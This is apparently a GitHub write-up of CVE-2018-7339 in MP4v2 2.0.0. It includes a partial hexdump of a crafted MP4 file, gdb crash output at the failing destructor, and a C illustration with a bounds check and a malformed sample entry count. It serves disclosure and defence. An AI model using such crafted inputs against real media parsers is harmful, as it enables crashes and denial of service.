pingsuewim/libmp4_bof

libmp4_bof

CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7339

The MP4Atom class in mp4atom.cpp in MP4v2 through 2.0.0 mishandles Entry Number validation for the MP4 Table Property, which allows remote attackers to cause a denial of service (overflow, insufficient memory allocation, and segmentation fault) or possibly have unspecified other impact via a crafted mp4 file.

MP4v2 through 2.0.0

The MP4 Table Property code that checks the Entry Number is vulnerable when opening a maliciously crafted MP4 file. This causes a memory crash and denial of service.

```
root@ubuntu:/home/wim# hexdump -C wim.mp4 | grep 63
00000020 de 36 00 00 6c 69 62 66 61 61 63 20 31 2e 32 36 |.6..libfaac 1.26|
00000330 3e ff af f3 c7 0b ba b2 a5 51 2a b2 63 43 ed ba |>........Q*.cC..|
00000500 ac 08 90 50 56 14 81 5c 70 aa 05 ef 34 1a a4 63 |...PV..\p...4..c|
00000510 a8 63 26 5d 78 02 04 08 08 01 6a a7 72 00 85 50 |.c&]x.....j.r..P|
00000630 cb 58 02 6a 02 02 80 2e 00 00 04 c0 12 01 70 00 |.X.j..........p.|
00000880 9f ce 33 e1 f6 03 b3 e6 63 fd be d7 25 3f 38 d9 |..3.....c...%?8.|
00000bd0 00 00 00 99 00 00 00 28 73 74 73 63 00 00 00 00 |.......(stsc....|
00000c00 73 74 63 6f 00 00 00 00 00 00 00 03 00 00 00 20 |stco........... |
00000c10 00 00 04 ab 00 00 08 df 00 00 00 20 63 74 74 73 |........... ctts|
```

The Entry Number in the MP4 Table Property is insufficiently checked (m_pProperties[i], 0xC1C ~ 0xC1F, in /src/mp4atom.cpp).

When the overflow occurs, only a small amount of memory is allocated, and a crash occurs while reading data because of a memory reference error.
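A minimal illustration of the failure mode described above, added here and not taken from MP4v2: a 32-bit size computed from a file-supplied entry count wraps to a small value, while a validator bounds the count by the bytes the atom actually holds. The function names and sample bytes are assumptions constructed for this example; the layout is the standard ctts one (version/flags, entry count, 8-byte entries).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define CTTS_ENTRY_SIZE 8u /* sample_count + sample_offset, 4 bytes each */

/* MP4 atom fields are big-endian. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Unchecked sizing in 32-bit arithmetic: the product wraps modulo 2^32,
 * so a huge entry count yields a tiny allocation size. */
uint32_t table_bytes_unchecked(uint32_t entry_count) {
    return entry_count * CTTS_ENTRY_SIZE;
}

/* Hypothetical validator. payload is the atom body after the 8-byte
 * size/type header: version+flags (4), entry_count (4), then entries.
 * Returns 0 and stores the count only if every declared entry fits. */
int ctts_count_checked(const uint8_t *payload, size_t len, uint32_t *out) {
    if (len < 8)
        return -1; /* truncated before entry_count */
    uint32_t count = be32(payload + 4);
    if (count > (len - 8) / CTTS_ENTRY_SIZE)
        return -1; /* division avoids the wrapping multiply */
    *out = count;
    return 0;
}

/* Constructed samples: 24-byte bodies, as in a 0x20-byte ctts atom. */
const uint8_t good_ctts[24] = {0, 0, 0, 0, 0, 0, 0, 2,
                               0, 0, 0, 1, 0, 0, 0, 0,
                               0, 0, 0, 1, 0, 0, 0, 0};
const uint8_t bad_ctts[24] = {0, 0, 0, 0, 0x20, 0, 0, 1}; /* count 0x20000001 */

int main(void) {
    uint32_t n = 0;
    printf("unchecked bytes for 0x20000001 entries: %u\n",
           (unsigned)table_bytes_unchecked(be32(bad_ctts + 4)));
    printf("good: %d\n", ctts_count_checked(good_ctts, sizeof good_ctts, &n));
    printf("bad:  %d\n", ctts_count_checked(bad_ctts, sizeof bad_ctts, &n));
    return 0;
}
```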

```
gdb-peda$ r ../wim.mp4
Starting program: /home/wim/.libs/lt-mp4info ../wim.mp4
/home/wim/.libs/lt-mp4info version 2.0.0
../wim.mp4:

Program received signal SIGSEGV, Segmentation fault.
registers
EAX: 0x80695c0 --> 0x0
EBX: 0xb7fd5000 --> 0x171e40
ECX: 0x0
EDX: 0x0
ESI: 0x8069510 --> 0xb7fd4108 --> 0xb7f0af50 (mp4v2::impl::MP4Atom::~MP4Atom(): push edi)
EBP: 0x8069510 --> 0xb7fd4108 --> 0xb7f0af50 (mp4v2::impl::MP4Atom::~MP4Atom(): push edi)
ESP: 0xbfffe890 --> 0x80695c0 --> 0x0
EIP: 0xb7f0af85 (mp4v2::impl::MP4Atom::~MP4Atom()+53: call DWORD PTR [edx+0x4])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
code
0xb7f0af7e <mp4v2::impl::MP4Atom::~MP4Atom()+46>: xchg   ax,ax
0xb7f0af80 <mp4v2::impl::MP4Atom::~MP4Atom()+48>: mov    edx,DWORD PTR [eax]
0xb7f0af82 <mp4v2::impl::MP4Atom::~MP4Atom()+50>: mov    DWORD PTR [esp],eax
=> 0xb7f0af85 mp4v2::impl::MP4Atom::~MP4Atom()+53: call DWORD PTR [edx+0x4]
0xb7f0af88 <mp4v2::impl::MP4Atom::~MP4Atom()+56>: cmp    DWORD PTR [esi+0x44],edi
0xb7f0af8b <mp4v2::impl::MP4Atom::~MP4Atom()+59>: jbe    0xb7f0afa0 <mp4v2::impl::MP4Atom::~MP4Atom()+80>
0xb7f0af8d <mp4v2::impl::MP4Atom::~MP4Atom()+61>: mov    edx,DWORD PTR [esi+0x4c]
0xb7f0af90 <mp4v2::impl::MP4Atom::~MP4Atom()+64>: add    edi,0x1
Guessed arguments: arg[0]: 0x80695c0 --> 0x0
stack
0000| 0xbfffe890 --> 0x80695c0 --> 0x0
0004| 0xbfffe894 --> 0xb7d736bc --> 0xf9
0008| 0xbfffe898 --> 0xffffffff
0012| 0xbfffe89c --> 0xb7fd5000 --> 0x171e40
0016| 0xbfffe8a0 --> 0xb7fd5000 --> 0x171e40
0020| 0xbfffe8a4 --> 0x8069510 --> 0xb7fd4108 --> 0xb7f0af50 (mp4v2::impl::MP4Atom::~MP4Atom(): push edi)
0024| 0xbfffe8a8 ("sttc\264W\354\267\020\225\006\b")
0028| 0xbfffe8ac --> 0xb7ec57b4 (mp4v2::impl::MP4StandardAtom::~MP4StandardAtom()+36: mov DWORD PTR [esp],esi)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xb7f0af85 in mp4v2::impl::MP4Atom::~MP4Atom (this=0x8069510, __in_chrg=) at src/mp4atom.cpp:66
66 delete m_pProperties[i];
```

mp4v2-2.0.0 (https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/mp4v2/mp4v2-2.0.0.tar.bz2) - v2-2.0.0
